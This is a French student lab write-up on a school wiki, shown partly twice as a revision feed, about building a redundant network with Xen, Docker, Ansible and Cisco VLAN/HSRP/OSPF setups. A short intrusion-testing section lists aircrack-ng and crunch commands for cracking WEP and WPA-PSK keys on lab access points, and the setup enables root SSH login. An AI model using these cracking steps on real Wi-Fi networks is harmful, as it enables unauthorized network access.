 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51990</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51990"/>
				<updated>2020-01-02T22:38:08Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration Générale */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues une fois que l'interconnexion avec le réseau de l'école est configurée (plus bas).&lt;br /&gt;
